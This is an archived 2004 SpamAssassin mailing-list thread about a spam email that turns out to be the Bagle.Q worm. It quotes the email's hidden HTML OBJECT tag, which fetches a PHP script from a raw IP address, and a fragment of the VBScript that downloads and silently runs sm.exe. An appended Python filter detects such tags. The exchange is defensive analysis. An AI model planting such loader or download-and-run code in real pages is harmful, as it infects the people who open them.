> > -----Original Message-----
> > From: Rick Macdougall [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, March 18, 2004 9:54 AM
> > To: Spamassassin-Talk (E-mail)
> > Subject: Re: interesting email...
> > 
> > 
> > Chris Santerre wrote:
> > 
> > > I think this is a spam :-) I don't allow scripting from my machine. Anyone
> > > get something like this: (I munged the To field.)
> > > 
> > > Received: from aandrews.org (orf-dsl5010-64-83-56-134-vlan12.dsl.cavtel.net
> > > [64.83.56.134])
> > >   by moglobal.com (8.12.5/8.12.5) with SMTP id i2IEZt0t017750
> > >   for <[EMAIL PROTECTED]>; Thu, 18 Mar 2004 09:36:05 -0500
> > > Date: Thu, 18 Mar 2004 09:31:55 -0500
> > > To: [EMAIL PROTECTED]  
> > > Subject: Encrypted document
> > > 
> > > <html><body>
> > > <font  face="System">
> > > <OBJECT STYLE="display:none" DATA="http://68.115.29.29:81/679186.php";>
> > > </OBJECT></body></html>
> > > 
> > > Tried to go to the site without the php file but got nothing. Appears to
> > > point to a home user of broadbands machine. Possibly trojaned??? Anyone got
> > > the guts to check out the php script? I don't! :)
> > 
> > Hi,
> > 
> > Bagle.Q, the php executes a vbscript posing as "Windows Update" and gets
> > a file called sm.exe and runs it.  The relevant code is below:
> > 
> > TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
> > TSO.write "Dim WshShell" & vbcrlf
> > TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
> > TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf
> > 
> > The php file generates a 1776 byte html file that contains the above
> > code (as well as additional stuff), it's safe to fetch or wget the url on
> > a U*ix machine.
> > 
> > Regards,
> > 
> > Rick
> > 


 Thanks all! I'm a week or so behind in my viral readings. But 
 not my updates ;) 
 
 I don't allow ActiveX scripting, so it didn't run the script. 
 I also realised right after I posted this, Doh! Just go to 
 the linux machine and get it! LOL. 
 
 And the more spam I get, the more that gets added to Bigevil :-)
 
 --chris
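
Added example, not part of the original thread: a mail-filter style check for the pattern in the quoted message, an HTML body whose OBJECT tag pulls its DATA from a remote URL. The function and class names are hypothetical, and the sample body is constructed from the HTML quoted above.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the HTML body quoted in the thread; the ';' that
# follows the URL in the archived copy is omitted here.
SAMPLE_BODY = '''<html><body>
<font  face="System">
<OBJECT STYLE="display:none" DATA="http://68.115.29.29:81/679186.php">
</OBJECT></body></html>'''

class ObjectTagScanner(HTMLParser):
    """Collects (url, reasons) for each OBJECT tag that loads remote data."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":          # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        url = a.get("data", "").strip()
        try:
            parts = urlsplit(url)
            port = parts.port        # raises ValueError on a malformed port
        except ValueError:
            return
        if parts.scheme not in ("http", "https"):
            return                   # cid: and other local references are not remote fetches
        reasons = ["remote OBJECT data"]
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden element")
        try:
            ipaddress.ip_address(parts.hostname or "")
            reasons.append("raw IP host")
        except ValueError:
            pass                     # host is a name, not an address literal
        if port not in (None, 80, 443):
            reasons.append("non-standard port")
        self.findings.append((url, reasons))

def scan_html_body(body):
    """Return the list of (url, reasons) findings for one HTML mail body."""
    scanner = ObjectTagScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for url, reasons in scan_html_body(SAMPLE_BODY):
        print(url, "->", ", ".join(reasons))
```
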